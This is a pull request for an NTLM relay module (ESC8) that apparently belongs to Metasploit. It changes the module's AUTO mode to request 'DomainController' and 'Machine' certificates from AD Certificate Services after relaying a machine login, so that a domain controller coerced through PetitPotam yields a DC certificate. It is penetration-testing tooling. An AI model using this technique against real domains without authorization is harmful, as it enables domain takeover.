### PR TITLE
Change behavior of esc8 'AUTO' mode to attempt to get a cert based on DC and Machine types

### DIFF
--- a/documentation/modules/auxiliary/server/relay/esc8.md
+++ b/documentation/modules/auxiliary/server/relay/esc8.md
@@ -20,10 +20,12 @@ The issue mode. This controls what the module will do once an authenticated sess
 server. Must be one of the following options:
 
 * ALL: Enumerate all available certificate templates and then issue each of them
-* AUTO: Automatically select either the `User` or `Machine` template to issue based on if the authenticated user is a
-  user or machine account. The determination is based on checking for a `$` at the end of the name, which means that it
-  is a machine account.
-* QUERY_ONLY: Enumerate all available certificate templates but do not issue any
+* AUTO: Automatically select either the `User` or `DomainController` and `Machine` (`Computer`) templates to issue
+  based on if the authenticated user is a user or machine account. The determination is based on checking for a `$` 
+  at the end of the name, which means that it is a machine account.
+* QUERY_ONLY: Enumerate all available certificate templates but do not issue any.  Not all certificate templates
+  available for use will be displayed; templates with the flag CT_FLAG_MACHINE_TYPE set will not show available and 
+  include `Machine` (AKA `Computer`) and `DomainController`  
 * SPECIFIC_TEMPLATE: Issue the certificate template specified in the `CERT_TEMPLATE` option
 
 ### CERT_TEMPLATE

--- a/modules/auxiliary/server/relay/esc8.rb
+++ b/modules/auxiliary/server/relay/esc8.rb
@@ -107,11 +107,13 @@ class MetasploitModule < Msf::Auxiliary
   def on_relay_success(relay_connection:, relay_identity:)
     case datastore['MODE']
     when 'AUTO'
-      cert_template = relay_identity.end_with?('$') ? 'Computer' : 'User'
-      retrieve_cert(relay_connection, relay_identity, cert_template)
+      cert_template = relay_identity.end_with?('$') ? ['DomainController', 'Machine'] : ['User']
+      retrieve_certs(relay_connection, relay_identity, cert_template)
     when 'ALL', 'QUERY_ONLY'
       cert_templates = get_cert_templates(relay_connection)
+
       unless cert_templates.nil? || cert_templates.empty?
+        print_status('***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***')
         print_good("Available Certificates for #{relay_identity} on #{datastore['RELAY_TARGET']}: #{cert_templates.join(', ')}")
         if datastore['MODE'] == 'ALL'
           retrieve_certs(relay_connection, relay_identity, cert_templates)

--- a/modules/auxiliary/server/relay/esc8.rb
+++ b/modules/auxiliary/server/relay/esc8.rb
@@ -111,7 +111,6 @@ class MetasploitModule < Msf::Auxiliary
       retrieve_certs(relay_connection, relay_identity, cert_template)
     when 'ALL', 'QUERY_ONLY'
       cert_templates = get_cert_templates(relay_connection)
-
       unless cert_templates.nil? || cert_templates.empty?
         print_status('***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***')
         print_good("Available Certificates for #{relay_identity} on #{datastore['RELAY_TARGET']}: #{cert_templates.join(', ')}")


### PR DESCRIPTION
This PR fixes one thing and adds support for another in the ESC8 module's `AUTO` mode.  Previously, `AUTO` mode requested a certificate based on the `Computer` template if the authenticating entity was a computer (name ended in `$`).

This changes 2 things:
1. As it turns out, if you'd like to generate a certificate based on the `Computer` template, you need to request it for the `Machine` Template because the certificate has both a template name and a display name.  Requesting the template by the `DisplayName` `Computer` fails; requesting the template name `Machine` succeeds.

2. In addition to fixing that, we added an attempt to get a cert based on the `DomainController` certificate template.  Now, when on `AUTO` if a computer login is detected we try to mint a cert based on both the `Machine` and `DomainController` templates so that if someone coerces a login from a DC using Petit Potam, we can get the DC cert.

To do:
- [x] Determine what permission allows us to issue a cert based on the DomainController and Machine certificate types.  To get it to work, I added all the permissions I could find, so I need to narrow that one down a bit....